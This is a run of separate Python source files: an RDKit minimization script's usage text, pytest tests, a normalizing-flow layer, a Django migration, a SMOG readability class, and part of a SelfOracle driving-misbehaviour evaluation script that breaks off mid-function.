# Setup a usage string for docopt...
_docoptUsage_ = """
RDKitPerformMinimization.py - Perform structure minimization
Usage:
RDKitPerformMinimization.py [--addHydrogens <yes or no>] [--conformerGenerator <SDG, ETDG, KDG, ETKDG, None>]
[--forceField <UFF, or MMFF>] [--forceFieldMMFFVariant <MMFF94 or MMFF94s>]
[--energyOut <yes or no>] [--enforceChirality <yes or no>] [--infileParams <Name,Value,...>]
[--maxConfs <number>] [--maxIters <number>] [--mp <yes or no>] [--mpParams <Name.Value,...>]
[ --outfileParams <Name,Value,...> ] [--overwrite] [--quiet <yes or no>] [ --removeHydrogens <yes or no>]
[--randomSeed <number>] [-w <dir>] -i <infile> -o <outfile>
RDKitPerformMinimization.py -h | --help | -e | --examples
Description:
Generate 3D structures for molecules using a combination of distance geometry
and forcefield minimization or minimize existing 3D structures using a specified
forcefield.
The supported input file formats are: Mol (.mol), SD (.sdf, .sd), SMILES (.smi)
.csv, .tcsv .txt)
The supported output file formats are: SD (.sdf, .sd)
Options:
-a, --addHydrogens <yes or no> [default: yes]
Add hydrogens before minimization.
-c, --conformerGenerator <SDG, ETDG, KDG, ETKDG, None> [default: ETKDG]
Conformation generation methodology for generating initial 3D coordinates.
Possible values: Standard Distance Geometry, (SDG), Experimental Torsion-angle
preference with Distance Geometry (ETDG), basic Knowledge-terms with Distance
Geometry (KDG), and Experimental Torsion-angle preference along with basic
Knowledge-terms with Distance Geometry (ETKDG) [Ref 129] .
The conformation generation step may be skipped by specifying 'None' value to
perform only forcefield minimization of molecules with 3D structures in input
file. This doesn't work for molecules in SMILES file or molecules in SD/MOL files
containing 2D structures.
-f, --forceField <UFF, MMFF> [default: MMFF]
Forcefield method to use for energy minimization. Possible values: Universal Force
Field (UFF) [ Ref 81 ] or Merck Molecular Mechanics Force Field [ Ref 83-87 ] .
--forceFieldMMFFVariant <MMFF94 or MMFF94s> [default: MMFF94]
Variant of MMFF forcefield to use for energy minimization.
--energyOut <yes or no> [default: No]
Write out energy values.
--enforceChirality <yes or no> [default: Yes]
Enforce chirality for defined chiral centers.
-e, --examples
Print examples.
-h, --help
Print this help message.
-i, --infile <infile>
Input file name.
--infileParams <Name,Value,...> [default: auto]
A comma delimited list of parameter name and value pairs for reading
molecules from files. The supported parameter names for different file
formats, along with their default values, are shown below:
SD, MOL: removeHydrogens,yes,sanitize,yes,strictParsing,yes
SMILES: smilesColumn,1,smilesNameColumn,2,smilesDelimiter,space,
smilesTitleLine,auto,sanitize,yes
Possible values for smilesDelimiter: space, comma or tab.
--maxConfs <number> [default: 250]
Maximum number of conformations to generate for each molecule by conformation
generation methodology for initial 3D coordinates. The conformations are minimized
using the specified forcefield and the lowest energy conformation is written to the
output file. This option is ignored during 'None' value of '-c --conformerGenerator'
option.
--maxIters <number> [default: 500]
Maximum number of iterations to perform for each molecule during forcefield
minimization.
--mp <yes or no> [default: no]
Use multiprocessing.
By default, input data is retrieved in a lazy manner via mp.Pool.imap()
function employing lazy RDKit data iterable. This allows processing of
arbitrarily large data sets without any additional memory requirements.
All input data may be optionally loaded into memory by mp.Pool.map()
before starting worker processes in a process pool by setting the value
of 'inputDataMode' to 'InMemory' in '--mpParams' option.
A word to the wise: The default 'chunkSize' value of 1 during 'Lazy' input
data mode may adversely impact the performance. The '--mpParams' section
provides additional information to tune the value of 'chunkSize'.
--mpParams <Name,Value,...> [default: auto]
A comma delimited list of parameter name and value pairs to
configure multiprocessing.
The supported parameter names along with their default and possible
values are shown below:
chunkSize, auto
inputDataMode, Lazy [ Possible values: InMemory or Lazy ]
numProcesses, auto [ Default: mp.cpu_count() ]
These parameters are used by the following functions to configure and
control the behavior of multiprocessing: mp.Pool(), mp.Pool.map(), and
mp.Pool.imap().
The chunkSize determines chunks of input data passed to each worker
process in a process pool by mp.Pool.map() and mp.Pool.imap() functions.
The default value of chunkSize is dependent on the value of 'inputDataMode'.
The mp.Pool.map() function, invoked during 'InMemory' input data mode,
automatically converts RDKit data iterable into a list, loads all data into
memory, and calculates the default chunkSize using the following method
as shown in its code:
chunkSize, extra = divmod(len(dataIterable), len(numProcesses) * 4)
if extra: chunkSize += 1
For example, the default chunkSize will be 7 for a pool of 4 worker processes
and 100 data items.
The mp.Pool.imap() function, invoked during 'Lazy' input data mode, employs
'lazy' RDKit data iterable to retrieve data as needed, without loading all the
data into memory. Consequently, the size of input data is not known a priori.
It's not possible to estimate an optimal value for the chunkSize. The default
chunkSize is set to 1.
The default value for the chunkSize during 'Lazy' data mode may adversely
impact the performance due to the overhead associated with exchanging
small chunks of data. It is generally a good idea to explicitly set chunkSize to
a larger value during 'Lazy' input data mode, based on the size of your input
data and number of processes in the process pool.
The mp.Pool.map() function waits for all worker processes to process all
the data and return the results. The mp.Pool.imap() function, however,
returns the results obtained from worker processes as soon as the
results become available for specified chunks of data.
The order of data in the results returned by both mp.Pool.map() and
mp.Pool.imap() functions always corresponds to the input data.
-o, --outfile <outfile>
Output file name.
--outfileParams <Name,Value,...> [default: auto]
A comma delimited list of parameter name and value pairs for writing
molecules to files. The supported parameter names for different file
formats, along with their default values, are shown below:
SD: kekulize,no
--overwrite
Overwrite existing files.
-q, --quiet <yes or no> [default: no]
Use quiet mode. The warning and information messages will not be printed.
-r, --removeHydrogens <yes or no> [default: Yes]
Remove hydrogens after minimization.
--randomSeed <number> [default: auto]
Seed for the random number generator for reproducing 3D coordinates.
Default is to use a random seed.
-w, --workingdir <dir>
Location of working directory which defaults to the current directory.
Examples:
To generate up to 250 conformations using ETKDG methodology followed by MMFF
forcefield minimization for a maximum of 500 iterations for molecules in a SMILES file
and write out a SD file containing minimum energy structure corresponding to each
molecule, type:
% RDKitPerformMinimization.py -i Sample.smi -o SampleOut.sdf
To rerun the first example in a quiet mode and write out a SD file, type:
% RDKitPerformMinimization.py -q yes -i Sample.smi -o SampleOut.sdf
To run the first example in multiprocessing mode on all available CPUs
without loading all data into memory and write out a SD file, type:
% RDKitPerformMinimization.py --mp yes -i Sample.smi -o SampleOut.sdf
To run the first example in multiprocessing mode on all available CPUs
by loading all data into memory and write out a SD file, type:
% RDKitPerformMinimization.py --mp yes --mpParams "inputDataMode,
InMemory" -i Sample.smi -o SampleOut.sdf
To run the first example in multiprocessing mode on specific number of
CPUs and chunk size without loading all data into memory and write out a SD file,
type:
% RDKitPerformMinimization.py --mp yes --mpParams "inputDataMode,Lazy,
numProcesses,4,chunkSize,8" -i Sample.smi -o SampleOut.sdf
To generate up to 150 conformations using ETKDG methodology followed by MMFF
forcefield minimization for a maximum of 250 iterations along with a specified random
seed for molecules in a SMILES file and write out a SD file containing minimum energy
structures corresponding to each molecule, type
% RDKitPerformMinimization.py --maxConfs 150 --randomSeed 201780117
--maxIters 250 -i Sample.smi -o SampleOut.sdf
To minimize structures in a 3D SD file using UFF forcefield for a maximum of 150
iterations without generating any conformations and write out a SD file containing
minimum energy structures corresponding to each molecule, type
% RDKitPerformMinimization.py -c None -f UFF --maxIters 150
-i Sample3D.sdf -o SampleOut.sdf
To generate up to 50 conformations using SDG methodology followed
by UFF forcefield minimization for a maximum of 50 iterations for
molecules in a CSV SMILES file, SMILES strings in column 1, name in
column 2, and write out a SD file, type:
% RDKitPerformMinimization.py --maxConfs 50 --maxIters 50 -c SDG
-f UFF --infileParams "smilesDelimiter,comma,smilesTitleLine,yes,
smilesColumn,1,smilesNameColumn,2" -i SampleSMILES.csv
-o SampleOut.sdf
Author:
Manish Sud(msud@san.rr.com)
See also:
RDKitCalculateRMSD.py, RDKitCalculateMolecularDescriptors.py, RDKitCompareMoleculeShapes.py,
RDKitConvertFileFormat.py, RDKitGenerateConformers.py, RDKitPerformConstrainedMinimization.py
Copyright:
Copyright (C) 2020 Manish Sud. All rights reserved.
The functionality available in this script is implemented using RDKit, an
open source toolkit for cheminformatics developed by Greg Landrum.
This file is part of MayaChemTools.
MayaChemTools is free software; you can redistribute it and/or modify it under
the terms of the GNU Lesser General Public License as published by the Free
Software Foundation; either version 3 of the License, or (at your option) any
later version.
"""
# Script entry point: run main() (defined earlier in this file) only when
# executed directly, not when imported as a module.
if __name__ == "__main__":
    main()
|
from tutorial import math_func
import sys
import pytest
@pytest.mark.skipif(sys.version_info < (3, 3),
                    reason="I don't want to test this.")
def test_add():
    """Integer addition, including the implicit default second addend."""
    for args, expected in [((7, 3), 10), ((7,), 9), ((5,), 7)]:
        assert math_func.add(*args) == expected
    print("hello")
@pytest.mark.number
def test_product():
    """Multiplication results, including the implicit default multiplier."""
    for args, expected in [((3, 7), 21), ((3, 0), 0), ((5,), 10)]:
        assert math_func.product(*args) == expected
@pytest.mark.string
def test_add_strings():
    """String concatenation through add()."""
    combined = math_func.add('Hello', ' World')
    assert combined == 'Hello World'
    assert type(combined) is str
    assert 'Heldlo' not in combined
@pytest.mark.string
def test_product_strings():
    """String repetition through product(), including the default count."""
    assert math_func.product('Hello ', 3) == 'Hello Hello Hello '
    repeated = math_func.product('Hello ')
    assert repeated == 'Hello Hello '
    assert type(repeated) is str
    assert 'Hello' in repeated
def test_add_float():
    """Floating-point addition (10.5 + 25.5 compares equal to int 36)."""
    assert math_func.add(10.5, 25.5) == 36
@pytest.mark.custom
@pytest.mark.parametrize(
    'x, y, result',
    [
        (7, 3, 10),
        ('Hello', ' World', 'Hello World'),
        (10.5, 25.5, 36),
    ],
)
def test_all_add(x, y, result):
    """Parametrized add() check across ints, strings and floats."""
    total = math_func.add(x, y)
    assert total == result
|
"""
(Pseudo-) Orthogonal Linear Layers. Advantage: Jacobian determinant is unity.
"""
import torch
from bgflow.nn.flow.base import Flow
__all__ = ["PseudoOrthogonalFlow"]
# Note: OrthogonalPPPP is implemented in pppp.py
class PseudoOrthogonalFlow(Flow):
    """Linear flow y = W*x + b with a penalty function
    penalty_parameter * ||W^T W - I||^2.

    Because W is (softly) constrained to be orthogonal, the Jacobian
    determinant is treated as unity, so both transforms report dlogp = 0.

    Attributes
    ----------
    dim : int
        Dimension of the input/output vectors.
    shift : bool
        Whether to use a trainable shift parameter (+b). If False, b=0.
    penalty_parameter : float
        Scaling factor for the orthogonality constraint.
    """

    def __init__(self, dim, shift=True, penalty_parameter=1e5):
        super(PseudoOrthogonalFlow, self).__init__()
        self.dim = dim
        # Start at the identity, which is exactly orthogonal (zero penalty).
        self.W = torch.nn.Parameter(torch.eye(dim))
        if shift:
            self.b = torch.nn.Parameter(torch.zeros(dim))
        else:
            # Non-trainable scalar zero; broadcasts over the last dimension.
            self.register_buffer("b", torch.tensor(0.0))
        self.register_buffer("penalty_parameter", torch.tensor(penalty_parameter))

    def _forward(self, x, **kwargs):
        """Forward transform y = W*x + b.

        Parameters
        ----------
        x : torch.Tensor
            The input vector. The transform is applied to the last dimension.
        kwargs : dict
            Keyword arguments to satisfy the interface.

        Returns
        -------
        y : torch.Tensor
            W*x + b
        dlogp : torch.Tensor
            Natural log of the Jacobian determinant (always zero here).
        """
        dlogp = torch.zeros(*x.shape[:-1], 1).to(x)
        y = torch.einsum("ab,...b->...a", self.W, x)
        return y + self.b, dlogp

    def _inverse(self, y, **kwargs):
        """Inverse transform x = W^T*(y-b), assuming W is orthogonal.

        Parameters
        ----------
        y : torch.Tensor
            The input vector. The transform is applied to the last dimension.
        kwargs : dict
            Keyword arguments to satisfy the interface.

        Returns
        -------
        x : torch.Tensor
            W^T*(y-b)
        dlogp : torch.Tensor
            Natural log of the Jacobian determinant (always zero here).
        """
        dlogp = torch.zeros(*y.shape[:-1], 1).to(y)
        x = torch.einsum("ab,...b->...a", self.W.transpose(1, 0), y - self.b)
        return x, dlogp

    def penalty(self):
        """Penalty function for the orthogonality constraint
        p(W) = penalty_parameter * ||W^T*W - I||^2.

        Returns
        -------
        penalty : torch.Tensor
            Value of the penalty function (scalar).
        """
        # Bug fix: create the identity on the same device/dtype as W so the
        # penalty also works when the module lives on a GPU or uses float64.
        eye = torch.eye(self.dim, dtype=self.W.dtype, device=self.W.device)
        return self.penalty_parameter * torch.sum((eye - torch.mm(self.W.transpose(1, 0), self.W)) ** 2)
|
# Generated by Django 2.0.7 on 2018-07-23 10:42
from django.db import migrations
class Migration(migrations.Migration):
    # Empty merge migration: it reconciles two divergent migration branches
    # of the 'api' app without applying any schema changes of its own.
    dependencies = [
        ('api', '0010_remove_populationdetailed_code'),
        ('api', '0013_merge_20180723_0744'),
    ]
    operations = [
    ]
|
from math import sqrt
from unravel.text.readability import BaseReadability
from unravel.text import ReadingLevel
class SimpleMeasureOfGobbledygook(BaseReadability):
    """
    The SMOG grade is a measure of readability that estimates the years of education needed to understand a
    piece of writing. It gives the estimated grade required to fully understand a piece of text.
    SMOG is an acronym for Simple Measure of Gobbledygook.
    SMOG is widely used, particularly for checking health messages.
    Description from https://en.wikipedia.org/wiki/SMOG

    Formula (as implemented in calc() below):
        grade = 1.0430 * sqrt(polysyllable words * (30 / total sentences)) + 3.1291
    """
    name = 'Simple Measure of Gobbledygook'
    slug = 'simple_measure_of_gobbledygook'

    def calc(self, text: str) -> ReadingLevel:
        """Return the SMOG ReadingLevel for *text*.

        Empty text or text with no sentences yields a ReadingLevel with no
        index/level/age set. The formula is designed for samples of 30+
        sentences; shorter texts produce a warning but are still scored.
        """
        if not text:
            return ReadingLevel(self.name)
        text_info = self._text_analyser.get_text_info(text)
        sentences = text_info.sentence_count
        polysyllable_words = text_info.polysyllable_count
        if sentences < 1:
            # Avoid division by zero below.
            return ReadingLevel(self.name)
        if sentences < 30:
            self._logger.warning('Calculating SMOG readability on text with fewer '
                                 'than 30 sentences ({})'.format(sentences))
        result = 1.0430 * sqrt(polysyllable_words * 30.0 / sentences) + 3.1291
        # Defensive clamp; with the constants above the result is always >= 3.1291.
        if result < 0:
            result = 0
        # Reading age is conventionally grade level + 4 years.
        reading = ReadingLevel(self.name, index=result, level=int(result), age=int(result) + 4)
        return reading
|
# Copyright 2021 Testing Automated @ Università della Svizzera italiana (USI)
# All rights reserved.
# This file is part of the project SelfOracle, a misbehaviour predictor for autonomous vehicles,
# developed within the ERC project PRECRIME
# and is released under the "MIT License Agreement". Please see the LICENSE
# file that should have been included as part of this package.
import csv
import gc
import os
import matplotlib.pyplot as plt
import numpy as np
import pandas as pd
from keras import backend as K
from scipy.stats import gamma
from sklearn.metrics import precision_score, recall_score, f1_score, roc_curve, roc_auc_score, precision_recall_curve, \
auc
from tqdm import tqdm
import utils
from config import Config
from selforacle.utils_vae import load_vae
from selforacle.vae import normalize_and_reshape, RESIZED_IMAGE_HEIGHT, RESIZED_IMAGE_WIDTH, IMAGE_CHANNELS
from utils import load_all_images
from utils import plot_reconstruction_losses
np.random.seed(0)
def load_or_compute_losses(anomaly_detector, dataset, cached_file_name, delete_cache):
    """Return the per-frame reconstruction losses of *anomaly_detector* on *dataset*.

    Losses are cached under ./cache/<cached_file_name>.npy; the cache is
    reused unless *delete_cache* is true, in which case it is removed and
    recomputed. Returns a plain Python list of loss values.
    """
    losses = []
    cache_dir = os.path.join(os.getcwd(), 'cache')
    cache_path = os.path.join(cache_dir, cached_file_name + '.npy')

    if delete_cache:
        if os.path.exists(cache_path):
            os.remove(cache_path)
            print("delete_cache=true. Removed losses cache file " + cached_file_name)

    try:
        losses = np.load(cache_path)
        losses = losses.tolist()
        print("Found losses data_nominal for " + cached_file_name)
        return losses
    except FileNotFoundError:
        print("Losses data_nominal for " + cached_file_name + " not found. Computing...")

        for x in tqdm(dataset):
            x = utils.resize(x)
            x = normalize_and_reshape(x)
            loss = anomaly_detector.test_on_batch(x)[1]  # total loss
            losses.append(loss)

        # Bug fix: np.save raised FileNotFoundError when the ./cache
        # directory did not exist yet; create it before saving.
        os.makedirs(cache_dir, exist_ok=True)
        np_losses = np.array(losses)
        np.save(cache_path, np_losses)
        print("Losses data_nominal for " + cached_file_name + " saved.")

    return losses
def plot_picture_orig_dec(orig, dec, picture_name, losses, num=10):
    """Plot the first *num* original frames (top row) against their VAE
    reconstructions (bottom row), annotate each reconstruction with its loss,
    and save the figure to *picture_name*.

    Assumes orig/dec entries reshape to (RESIZED_IMAGE_HEIGHT,
    RESIZED_IMAGE_WIDTH, IMAGE_CHANNELS) — TODO confirm with caller.
    """
    n = num
    plt.figure(figsize=(40, 8))
    for i in range(n):
        # display original
        ax = plt.subplot(2, n, i + 1)
        plt.imshow(orig[i].reshape(RESIZED_IMAGE_HEIGHT, RESIZED_IMAGE_WIDTH, IMAGE_CHANNELS))
        ax.get_xaxis().set_visible(False)
        ax.get_yaxis().set_visible(False)
        plt.title("Original Photo")
        # display reconstruction
        ax = plt.subplot(2, n, i + 1 + n)
        plt.imshow(dec[i].reshape(RESIZED_IMAGE_HEIGHT, RESIZED_IMAGE_WIDTH, IMAGE_CHANNELS))
        ax.get_xaxis().set_visible(False)
        ax.get_yaxis().set_visible(False)
        plt.title("Reconstructed loss %.4f" % losses[i])
    plt.savefig(picture_name, bbox_inches='tight')
    plt.show()
    plt.close()
def get_results_mispredictions(cfg, sim_name, name,
                               losses_on_nominal, losses_on_anomalous,
                               data_df_nominal, data_df_anomalous,
                               seconds_to_anticipate):
    """Evaluate window-level misbehaviour prediction.

    Frames are grouped into one-second windows (fps frames each). A window is
    predicted positive when its mean loss exceeds a Gamma-fit threshold on the
    nominal losses. TP/FN come from the anomalous run, FP/TN from the nominal
    run. Precision, recall, F1, AUC-ROC and AUC-PRC are printed and appended
    to novelty_detection.csv.
    """
    # only occurring when conditions == unexpected
    true_positive_windows = 0
    false_negative_windows = 0
    # only occurring when conditions == nominal
    false_positive_windows = 0
    true_negative_windows = 0

    # get threshold on nominal data_nominal
    threshold = get_threshold(losses_on_nominal, conf_level=0.95)

    '''
    prepare dataset to get TP and FN from unexpected
    '''
    number_frames_anomalous = pd.Series.max(data_df_anomalous['frameId'])
    simulation_time_anomalous = pd.Series.max(data_df_anomalous['time'])
    # NOTE(review): integer fps; assumes frameId counts from the start of the
    # simulation and time is in seconds — confirm against the log format.
    fps_anomalous = number_frames_anomalous // simulation_time_anomalous

    crashed_anomalous = data_df_anomalous['crashed']
    crashed_anomalous.is_copy = None

    # creates the ground truth: first frame of every 0 -> 1 crash transition
    all_first_frame_position_crashed_sequences = []
    for idx, item in enumerate(crashed_anomalous):
        if idx == number_frames_anomalous:
            continue  # do not index past the last frame below
        if crashed_anomalous[idx] == 0 and crashed_anomalous[idx + 1] == 1:
            first_index_crash = idx + 1
            all_first_frame_position_crashed_sequences.append(first_index_crash)
            print("first_index_crash: %d" % first_index_crash)
    print("identified %d crash sequences" % len(all_first_frame_position_crashed_sequences))
    print(all_first_frame_position_crashed_sequences)

    # label the reaction period before each crash as positive
    frames_to_reassign = fps_anomalous * seconds_to_anticipate

    reaction_frames = pd.Series()
    for item in all_first_frame_position_crashed_sequences:
        # NOTE(review): .loc with a two-element list sets only the two
        # endpoint labels; if the whole range was intended, a slice
        # .loc[item - frames_to_reassign:item] would be needed — confirm.
        crashed_anomalous.loc[[item - frames_to_reassign, item]] = 1
        reaction_frames = reaction_frames.append(crashed_anomalous[item - frames_to_reassign:item])
        print("frames between %d and %d have been labelled as 1" % (item - frames_to_reassign, item))
    print("reaction frames size %d" % len(reaction_frames))

    sma_anomalous = pd.Series(losses_on_anomalous)

    # drop all frames labelled 0 so only crash/reaction frames remain
    assert len(sma_anomalous) == len(crashed_anomalous)
    idx_to_remove = []
    for idx, loss in enumerate(sma_anomalous):
        if crashed_anomalous[idx] == 0:
            idx_to_remove.append(idx)
    crashed_anomalous = crashed_anomalous.drop(crashed_anomalous.index[idx_to_remove])
    sma_anomalous = sma_anomalous.drop(sma_anomalous.index[idx_to_remove])

    # trim to whole windows plus one extra frame (the extra frame is removed
    # after the window loop below)
    num_windows_anomalous = len(crashed_anomalous) // fps_anomalous
    # Bug fix: the original computed "leftover - 1" and sliced with a
    # negative index unconditionally; when the leftover was 0 or 1 that
    # slice ([:-(-1)] or [:-0]) destroyed almost the entire series. A
    # positive slice keeps exactly the intended prefix instead.
    target_len_anomalous = num_windows_anomalous * fps_anomalous + 1
    crashed_anomalous = crashed_anomalous[:target_len_anomalous]
    sma_anomalous = sma_anomalous[:target_len_anomalous]
    assert len(crashed_anomalous) == len(sma_anomalous)

    prediction = []
    for idx, loss in enumerate(sma_anomalous):
        if idx != 0 and idx % fps_anomalous == 0:
            window_mean = pd.Series(sma_anomalous.iloc[idx - fps_anomalous:idx]).mean()
            crashed_mean = pd.Series(crashed_anomalous[idx - fps_anomalous:idx]).mean()
            if window_mean >= threshold:
                if crashed_mean > 0:
                    true_positive_windows += 1
                    prediction.extend([1] * fps_anomalous)
                else:
                    # every remaining frame is labelled 1, so this is unreachable
                    raise ValueError
            elif window_mean < threshold:
                if crashed_mean > 0:
                    false_negative_windows += 1
                    prediction.extend([0] * fps_anomalous)
                else:
                    raise ValueError
    assert false_negative_windows + true_positive_windows == num_windows_anomalous

    # drop the extra frame kept above so lengths match the predictions
    crashed_anomalous = crashed_anomalous[:-1]
    sma_anomalous = sma_anomalous[:-1]
    assert len(prediction) == len(crashed_anomalous) == len(sma_anomalous)

    '''
    prepare dataset to get FP and TN from unexpected
    '''
    number_frames_nominal = pd.Series.max(data_df_nominal['frameId'])
    simulation_time_nominal = pd.Series.max(data_df_nominal['time'])
    fps_nominal = number_frames_nominal // simulation_time_nominal

    crashed_nominal = data_df_nominal['crashed']
    crashed_nominal.is_copy = None

    num_windows_nominal = len(crashed_nominal) // fps_nominal
    # Bug fix: same positive-slice trimming as on the anomalous side.
    target_len_nominal = num_windows_nominal * fps_nominal + 1
    crashed_nominal = crashed_nominal[:target_len_nominal]
    losses_nominal = losses_on_nominal[:target_len_nominal]
    assert len(crashed_nominal) == len(losses_nominal)

    losses = pd.Series(losses_nominal)
    sma_nominal = losses.rolling(fps_nominal, min_periods=1).mean()
    assert len(crashed_nominal) == len(losses) == len(sma_nominal)

    for idx, loss in enumerate(sma_nominal):
        if idx != 0 and idx % fps_nominal == 0:
            window_mean = pd.Series(sma_nominal.iloc[idx - fps_nominal:idx]).mean()
            crashed_mean = pd.Series(crashed_nominal[idx - fps_nominal:idx]).mean()
            if window_mean >= threshold:
                if crashed_mean == 0:
                    false_positive_windows += 1
                    prediction.extend([1] * fps_nominal)
                else:
                    # nominal data contains no crashes, so this is unreachable
                    raise ValueError
            elif window_mean < threshold:
                if crashed_mean == 0:
                    true_negative_windows += 1
                    prediction.extend([0] * fps_nominal)
                else:
                    raise ValueError

    print("false positives: %d - true negatives: %d" % (false_positive_windows, true_negative_windows))
    assert false_positive_windows + true_negative_windows == num_windows_nominal

    crashed_nominal = crashed_nominal[:-1]
    # Bug fix: the original assigned crashed_nominal[:-1] to sma_nominal here
    # (copy-paste error); trim sma_nominal itself instead.
    sma_nominal = sma_nominal[:-1]
    assert len(prediction) == (len(crashed_anomalous) + len(crashed_nominal))

    crashed = pd.concat([crashed_anomalous, crashed_nominal])
    assert len(prediction) == len(crashed)

    print("time to misbehaviour (s): %d" % seconds_to_anticipate)
    # Calculate and print precision and recall as percentages
    print("Precision: " + str(round(precision_score(crashed, prediction) * 100, 1)) + " % ")
    print("Recall: " + str(round(recall_score(crashed, prediction) * 100, 1)) + " % ")
    # Obtain and print F1 score as a percentage
    print("F1 score: " + str(round(f1_score(crashed, prediction) * 100, 1)) + " %")

    fpr, tpr, thresholds = roc_curve(crashed, prediction)
    # Obtain and print AUC-ROC
    print("AUC-ROC: " + str(round(roc_auc_score(crashed, prediction), 3)))

    precision, recall, _ = precision_recall_curve(crashed, prediction)
    auc_score = auc(recall, precision)
    print("AUC-PRC: " + str(round(auc_score, 3)) + "\n")

    if not os.path.exists('novelty_detection.csv'):
        with open('novelty_detection.csv', mode='w', newline='') as class_imbalance_result_file:
            writer = csv.writer(class_imbalance_result_file, delimiter=',', quotechar='"', quoting=csv.QUOTE_MINIMAL,
                                lineterminator='\n')
            writer.writerow(
                ["simulation", "autoencoder", "ttd", "precision", "recall", "f1", "auc", "aucprc"])
            writer.writerow([sim_name, name, seconds_to_anticipate,
                             str(round(precision_score(crashed, prediction) * 100, 1)),
                             str(round(recall_score(crashed, prediction) * 100, 1)),
                             str(round(f1_score(crashed, prediction) * 100, 1)),
                             str(round(roc_auc_score(crashed, prediction), 3)),
                             str(round(auc_score, 3))])
    else:
        # Bug fix: the append branch now also passes newline='' like the
        # write branch above, avoiding blank rows on Windows.
        with open('novelty_detection.csv', mode='a', newline='') as novelty_detection_result_file:
            writer = csv.writer(novelty_detection_result_file, delimiter=',', quotechar='"', quoting=csv.QUOTE_MINIMAL,
                                lineterminator='\n')
            writer.writerow([sim_name, name, seconds_to_anticipate,
                             str(round(precision_score(crashed, prediction) * 100, 1)),
                             str(round(recall_score(crashed, prediction) * 100, 1)),
                             str(round(f1_score(crashed, prediction) * 100, 1)),
                             str(round(roc_auc_score(crashed, prediction), 3)),
                             str(round(auc_score, 3))])
            if seconds_to_anticipate == 3:
                # blank separator row after the last anticipation horizon
                writer.writerow(["", "", "", "", "", "", "", ""])
def get_threshold(losses, conf_level=0.95):
# print("Fitting reconstruction error distribution using Gamma distribution")
shape, loc, scale = gamma.fit(losses, floc=0)
# print("Creating thresholds using the confidence intervals: %s" % conf_level)
t = gamma.ppf(conf_level, shape, loc=loc, scale=scale)
print('threshold: ' + str(t))
return t
def get_scores(cfg, name, new_losses, losses, threshold):
    """Classify every frame of the current simulation as TP/FP/TN/FN.

    Classification is done three ways: by autoencoder loss vs *threshold*
    (against the 'crashed' ground truth), by uncertainty vs a Gamma-fit
    tolerance level, and by CTE vs cfg.CTE_TOLERANCE_LEVEL. Also estimates
    catastrophic forgetting as the mean/std increase of *new_losses* over
    *losses*, and appends a summary row to class_imbalance.csv.

    Returns (likely_false_positive_unc, likely_false_positive_cte,
    catastrophic_forgetting).
    """
    # only occurring when conditions == unexpected
    true_positive = []
    false_negative = []
    # only occurring when conditions == nominal
    false_positive = []
    true_negative = []
    # required for adaptation
    likely_true_positive_unc = []
    likely_false_positive_cte = []
    likely_false_positive_unc = []
    likely_true_positive_cte = []
    likely_true_negative_unc = []
    likely_false_negative_unc = []
    likely_true_negative_cte = []
    likely_false_negative_cte = []
    # get threshold: fit one from the losses only when none was supplied
    if threshold is not None:
        threshold = threshold
    else:
        threshold = get_threshold(losses, conf_level=0.95)
    # load the online uncertainty from csv
    path = os.path.join(cfg.TESTING_DATA_DIR,
                        cfg.SIMULATION_NAME,
                        'driving_log.csv')
    data_df = pd.read_csv(path)
    uncertainties = data_df["uncertainty"]
    cte_values = data_df["cte"]
    crashed_values = data_df["crashed"]
    # NOTE(review): this mutates cfg as a side effect — callers see the
    # recomputed uncertainty tolerance level.
    cfg.UNCERTAINTY_TOLERANCE_LEVEL = get_threshold(uncertainties, conf_level=0.95)
    print("loaded %d uncertainty and %d CTE values" % (len(uncertainties), len(cte_values)))
    # Assumes losses and driving_log.csv rows are index-aligned, one loss
    # per frame — TODO confirm against the caller.
    for idx, loss in enumerate(losses):
        if loss >= threshold:
            # autoencoder based
            if crashed_values[idx] == 0:
                false_positive.append(idx)
            elif crashed_values[idx] == 1:
                true_positive.append(idx)
            # uncertainty based
            if uncertainties[idx] < cfg.UNCERTAINTY_TOLERANCE_LEVEL:
                likely_false_positive_unc.append(idx)
            else:
                likely_true_positive_unc.append(idx)
            # cte based
            if cte_values[idx] < cfg.CTE_TOLERANCE_LEVEL:
                likely_false_positive_cte.append(idx)
            else:
                likely_true_positive_cte.append(idx)
        elif loss < threshold:  # either FN/TN
            # autoencoder based
            if crashed_values[idx] == 0:
                true_negative.append(idx)
            elif crashed_values[idx] == 1:
                false_negative.append(idx)
            # uncertainty based
            if uncertainties[idx] > cfg.UNCERTAINTY_TOLERANCE_LEVEL:
                likely_true_negative_unc.append(idx)
            else:
                likely_false_negative_unc.append(idx)
            # cte based
            if cte_values[idx] > cfg.CTE_TOLERANCE_LEVEL:
                likely_true_negative_cte.append(idx)
            else:
                likely_false_negative_cte.append(idx)
    # every frame must land in exactly one bucket per criterion
    assert len(losses) == (len(true_positive) + len(false_negative) +
                           len(false_positive) + len(true_negative))
    assert len(losses) == (len(likely_true_positive_unc) + len(likely_false_negative_unc) +
                           len(likely_false_positive_unc) + len(likely_true_negative_unc))
    assert len(losses) == (len(likely_true_positive_cte) + len(likely_false_negative_cte) +
                           len(likely_false_positive_cte) + len(likely_true_negative_cte))
    print("true_positive: %d" % len(true_positive))
    print("false_negative: %d" % len(false_negative))
    print("false_positive: %d" % len(false_positive))
    print("true_negative: %d" % len(true_negative))
    print("")
    print("likely_true_positive (unc): %d" % len(likely_true_positive_unc))
    print("likely_false_negative (unc): %d" % len(likely_false_negative_unc))
    print("likely_false_positive (unc): %d" % len(likely_false_positive_unc))
    print("likely_true_negative (unc): %d" % len(likely_true_negative_unc))
    print("")
    print("likely_true_positive (cte): %d" % len(likely_true_positive_cte))
    print("likely_false_negative (cte): %d" % len(likely_false_negative_cte))
    print("likely_false_positive (cte): %d" % len(likely_false_positive_cte))
    print("likely_true_negative (cte): %d" % len(likely_true_negative_cte))
    # compute average catastrophic forgetting; stays NaN when losses and
    # new_losses are the same data
    catastrophic_forgetting = np.empty(2)
    catastrophic_forgetting[:] = np.NaN
    # NOTE(review): element-wise list comparison; assumes both are plain
    # Python lists (an ndarray here would make the 'if' ambiguous) — confirm.
    if losses != new_losses:
        assert len(losses) == len(new_losses)
        errors = list()
        for idx, loss in enumerate(losses):
            loss_original = losses[idx]
            loss_new = new_losses[idx]
            if loss_new > loss_original:
                errors.append(loss_new - loss_original)
        catastrophic_forgetting = list()
        catastrophic_forgetting.append(np.mean(errors))
        catastrophic_forgetting.append(np.std(errors))
        print(
            f"catastrophic forgetting (mean/std): {catastrophic_forgetting[0]:.2f} +- {catastrophic_forgetting[1]:.2f}")
    if not os.path.exists('class_imbalance.csv'):
